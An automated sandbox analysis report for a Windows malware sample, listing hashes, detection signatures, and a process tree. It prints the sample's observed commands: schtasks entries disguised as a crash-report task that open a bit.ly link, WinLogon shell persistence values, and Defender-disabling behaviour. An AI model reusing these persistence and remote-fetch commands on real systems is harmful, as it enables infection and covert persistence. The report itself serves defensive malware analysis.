Analysis
-
max time kernel
72s -
max time network
132s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
03-11-2021 08:37
Static task
static1
Behavioral task
behavioral1
Sample
2e45c3146bebd87ccef96e054374ea11.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
2e45c3146bebd87ccef96e054374ea11.exe
Resource
win10-en-20211014
General
-
Target
2e45c3146bebd87ccef96e054374ea11.exe
-
Size
645KB
-
MD5
2e45c3146bebd87ccef96e054374ea11
-
SHA1
f2be6622242c311beb54f984c2fd85b865c2431c
-
SHA256
df6fa5b55c8196df0a53575cd26f5a7e53146899d41ab1a1a3acdb320f185d1f
-
SHA512
4277153eaea844fdcd1ab7920d290f7a877a2a46e6d71b5b962f445395e7c0299e859409fb52e96920bc31ab6d7ed2be81e69021c0145585984dc57c76469b51
Malware Config
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
resource yara_rule behavioral2/files/0x000400000001aba0-121.dat disable_win_def behavioral2/files/0x000400000001aba0-122.dat disable_win_def -
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\security\\wowreg32.exe\"" wowreg32.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell = "explorer.exe,\"C:\\Users\\Admin\\AppData\\Roaming\\security\\wowreg32.exe\"" 2e45c3146bebd87ccef96e054374ea11.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts wowreg32.exe -
Executes dropped EXE 1 IoCs
pid Process 440 wowreg32.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 1140 440 WerFault.exe 72 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3120 schtasks.exe 2516 schtasks.exe 2504 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4320 2e45c3146bebd87ccef96e054374ea11.exe 4320 2e45c3146bebd87ccef96e054374ea11.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe 440 wowreg32.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
description pid Process Token: SeDebugPrivilege 4320 2e45c3146bebd87ccef96e054374ea11.exe Token: SeBackupPrivilege 4320 2e45c3146bebd87ccef96e054374ea11.exe Token: SeSecurityPrivilege 4320 2e45c3146bebd87ccef96e054374ea11.exe Token: SeBackupPrivilege 4320 2e45c3146bebd87ccef96e054374ea11.exe Token: SeDebugPrivilege 440 wowreg32.exe Token: SeDebugPrivilege 440 wowreg32.exe Token: SeShutdownPrivilege 1140 WerFault.exe Token: SeDebugPrivilege 1140 WerFault.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 440 wowreg32.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 4320 wrote to memory of 4720 4320 2e45c3146bebd87ccef96e054374ea11.exe 69 PID 4320 wrote to memory of 4720 4320 2e45c3146bebd87ccef96e054374ea11.exe 69 PID 4720 wrote to memory of 3120 4720 cmd.exe 71 PID 4720 wrote to memory of 3120 4720 cmd.exe 71 PID 4320 wrote to memory of 440 4320 2e45c3146bebd87ccef96e054374ea11.exe 72 PID 4320 wrote to memory of 440 4320 2e45c3146bebd87ccef96e054374ea11.exe 72 PID 440 wrote to memory of 2504 440 wowreg32.exe 75 PID 440 wrote to memory of 2504 440 wowreg32.exe 75 PID 440 wrote to memory of 2516 440 wowreg32.exe 74 PID 440 wrote to memory of 2516 440 wowreg32.exe 74
Processes
-
C:\Users\Admin\AppData\Local\Temp\2e45c3146bebd87ccef96e054374ea11.exe"C:\Users\Admin\AppData\Local\Temp\2e45c3146bebd87ccef96e054374ea11.exe"1⤵
- Modifies WinLogon for persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Windows\SYSTEM32\cmd.execmd /C schtasks /create /f /st "20:49" /sc weekly /mo "28" /d "Thu" /tn "NvTmRep_CrashReport{NNLQXVLP}" /tr "'explorer'http://bit.ly/2rkW7gZ"2⤵
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\system32\schtasks.exeschtasks /create /f /st "20:49" /sc weekly /mo "28" /d "Thu" /tn "NvTmRep_CrashReport{NNLQXVLP}" /tr "'explorer'http://bit.ly/2rkW7gZ"3⤵
- Creates scheduled task(s)
PID:3120
-
-
-
C:\Users\Admin\AppData\Roaming\security\wowreg32.exe"C:\Users\Admin\AppData\Roaming\security\wowreg32.exe"2⤵
- Modifies WinLogon for persistence
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:440 -
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "15:00" /sc daily /mo "6" /tn "" /tr "'explorer'C_Settings.URL2"3⤵
- Creates scheduled task(s)
PID:2516
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /f /st "15:00" /sc daily /mo "2" /tn "" /tr "'explorer'C_Settings.URL1"3⤵
- Creates scheduled task(s)
PID:2504
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 440 -s 37563⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
-